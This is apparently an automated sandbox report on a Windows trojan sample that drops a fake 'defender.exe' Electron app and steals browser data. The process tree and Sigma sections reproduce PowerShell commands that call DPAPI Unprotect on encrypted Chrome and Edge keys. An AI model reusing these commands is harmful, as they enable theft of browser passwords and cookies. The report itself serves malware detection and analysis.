Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe

Overview

General Information

Sample name:SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
Analysis ID:1487580
MD5:a4590450863f13aa67198ec0fe52453e
SHA1:7bc926cf52aa4c390cb7d6ac5756a9b95f6e8fb2
SHA256:d5628dd0e0710c14d9241a3eb0871dfa4fccf0888f6503d8b9a794cb5e8e6d71
Tags:exe
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
AI detected suspicious sample
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sigma detected: Use Short Name Path in Command Line
Steals Internet Explorer cookies
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe (PID: 4540 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe" MD5: A4590450863F13AA67198EC0FE52453E)
    • defender.exe (PID: 1660 cmdline: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe MD5: 050F6E0968C055E912AB6CA8DC12A881)
      • cmd.exe (PID: 2324 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 2348 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 6244 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6204 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 6176 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4116 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 516 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2256 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • defender.exe (PID: 5140 cmdline: "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\defender" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1832 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 050F6E0968C055E912AB6CA8DC12A881)
      • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • defender.exe (PID: 5484 cmdline: "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\defender" --mojo-platform-channel-handle=2132 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 050F6E0968C055E912AB6CA8DC12A881)
      • defender.exe (PID: 2324 cmdline: "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\defender" --app-path="C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources\app.asar" --no-sandbox --no-zygote --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1722781275767759 --launch-time-ticks=4443586976 --mojo-platform-channel-handle=2360 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1 MD5: 050F6E0968C055E912AB6CA8DC12A881)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Use Short Name Path in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe, ParentProcessId: 4540, ParentProcessName: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe, ProcessId: 1660, ProcessName: defender.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser'), CommandLine: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser'), CommandLine|base64offset|contains: ~O*^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.2% probability
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFAAB7D4B42 CryptUnprotectData,23_2_00007FFAAB7D4B42
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFAAB7D4FEE CryptUnprotectData,23_2_00007FFAAB7D4FEE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFAAB894FEE CryptUnprotectData,26_2_00007FFAAB894FEE
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsrF83A.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\LICENSE.electron.txtJump to behavior
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user~1\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user~1\AppData\LocalJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtPJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resourcesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user~1\AppData\Local\TempJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user~1Jump to behavior
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewIP Address: 172.64.41.3 172.64.41.3
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: www.setekshome.com
Source: global trafficDNS traffic detected: DNS query: ws-eu.pusher.com
Source: global trafficDNS traffic detected: DNS query: sockjs-eu.pusher.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: stats.pusher.com
Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: elevate.exe.0.drString found in binary or memory: http://int3.de/
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000017.00000002.1646408112.0000023AB1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1646408112.0000023AB13EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1612107420.0000023AA2CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD86E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: powershell.exe, 0000001A.00000002.1675946104.0000019ACF0BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1775864991.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1775178622.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1775842222.0000000008810000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.
Source: powershell.exe, 00000017.00000002.1612107420.0000023AA1381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACD801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001A.00000002.1675946104.0000019ACF0BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: powershell.exe, 00000017.00000002.1612107420.0000023AA1381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACD801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://alekberg.net/privacy
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://alekberg.net/privacyalekberg.net
Source: explorer.exe, 0000001D.00000000.1776329895.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DA6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://chrome-devtools-frontend.appspot.com/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://chrome-devtools-frontend.appspot.com/%s%s/%s/NetworkResourceLoaderstreamWriteInspectableWebC
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.0
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: fr.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=fr&category=theme81https://myactivity.google.com/myactivity/?u
Source: fr.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=frRaccourci
Source: zh-CN.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=zh-CN
Source: zh-CN.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=zh-CN&category=theme81https://myactivity.google.com/myactivity
